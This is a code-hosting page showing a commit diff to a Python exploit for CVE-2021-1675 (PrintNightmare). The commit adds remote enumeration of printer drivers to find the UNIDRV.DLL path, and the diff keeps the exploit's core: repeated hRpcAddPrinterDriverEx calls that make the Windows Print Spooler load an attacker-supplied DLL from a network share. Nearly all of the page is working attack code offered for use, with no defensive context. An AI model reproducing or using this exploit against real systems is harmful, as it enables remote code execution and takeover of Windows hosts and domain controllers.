r3pek
/
CVE-2021-1675
mirror of https://github.com/cube0x0/CVE-2021-1675.git
1
0
Fork 0
Code Releases Activity

Added dynamic pDriverPath, remember to update impacket

Browse Source 
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
pull/21/head
cube0x0 3 years ago
parent 2f4b1def94
commit 3bad3016ac
2 changed files with 55 additions and 8 deletions
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Show Stats Download Patch File Download Diff File
  1. 63
      CVE-2021-1675.py
  2. BIN
      Images/poc.png

63
CVE-2021-1675.py
Unescape View File

@ -2,9 +2,34 @@
from impacket.dcerpc.v5 import rprn from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
import argparse import argparse
import sys import sys
import time import time
import pathlib
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
class DRIVER_INFO_2_BLOB(Structure):
structure = (
('cVersion','<L'),
('NameOffset', '<L'),
('EnvironmentOffset', '<L'),
('DriverPathOffset', '<L'),
('DataFileOffset', '<L'),
('ConfigFileOffset', '<L'),
)
def __init__(self, data = None):
Structure.__init__(self, data = data)
def fromString(self,data):
Structure.fromString(self, data)
self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
def connect(username, password, domain, lmhash, nthash, address, port): def connect(username, password, domain, lmhash, nthash, address, port):
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@ -29,10 +54,36 @@ def connect(username, password, domain, lmhash, nthash, address, port):
return dce return dce
def getDrivers(dce, handle=NULL):
#get drivers
resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
data = b''.join(resp['pDrivers'])
#parse drivers
blob = DRIVER_INFO_2_BLOB()
blob.fromString(data)
#blob.dump()
return blob
def main(username, password, domain, lmhash, nthash, address, port, share): def main(username, password, domain, lmhash, nthash, address, port, share):
#connect #connect
dce = connect(username, password, domain, lmhash, nthash, address, port) dce = connect(username, password, domain, lmhash, nthash, address, port)
#handle = "\\\\{0}\x00".format(address)
handle = NULL
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
try:
blob = getDrivers(dce, handle)
pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
except Exception as e:
print('[-] Failed to enumerate remote pDriverPath')
print(str(e))
sys.exit(1)
print("[+] pDriverPath Found {0}".format(pDriverPath))
#build DRIVER_CONTAINER package #build DRIVER_CONTAINER package
container_info = rprn.DRIVER_CONTAINER() container_info = rprn.DRIVER_CONTAINER()
container_info['Level'] = 2 container_info['Level'] = 2
@ -40,21 +91,17 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
container_info['DriverInfo']['Level2']['cVersion'] = 3 container_info['DriverInfo']['Level2']['cVersion'] = 3
container_info['DriverInfo']['Level2']['pName'] = "1234\x00" container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
#handle = "\\\\{0}\x00".format(address)
handle = NULL
filename = share.split("\\")[-1] filename = share.split("\\")[-1]
print("[*] Executing {0}".format(share))
print("[*] Uploading {0}".format(share))
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode'])) print("[*] Stage0: {0}".format(resp['ErrorCode']))
for i in range(1, 50): for i in range(1, 30):
try: try:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)

BIN
Images/poc.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 363 KiB

After

Width:  |  Height:  |  Size: 196 KiB

Write Preview
Loading…
Cancel
Save